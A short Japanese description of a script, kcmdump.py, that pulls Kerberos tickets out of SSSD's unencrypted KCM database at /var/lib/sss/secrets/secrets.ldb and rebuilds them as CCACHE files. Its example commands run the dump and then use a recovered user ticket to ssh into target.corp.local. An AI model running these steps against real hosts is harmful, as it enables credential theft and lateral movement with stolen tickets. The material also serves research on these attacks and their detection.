
SSSDのKCMデータベースからKerberosチケットをダンプする
SSSD が使用する KCM データベースをダンプし、Kerberos チケットを CCACHE 形式で復元する簡単なスクリプトです。
当初は SSSDKCMExtractor と KCMTicketFormatter に基づいています。
バージョン 2.0.0(2018-08-13)以降、SSSD の KCM レスポンダのバックエンドストレージは、データベースの内容を暗号化しなくなりました。ただし、依然として LDB データベース(それ自体は TDB に基づく)に依存しており、LDAP ライクなクエリで簡単に検索できます。
SSSD は Kerberos チケットに独自のストレージ形式を使用しており、このスクリプトを使用して標準の CCACHE ファイルに変換できます。
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local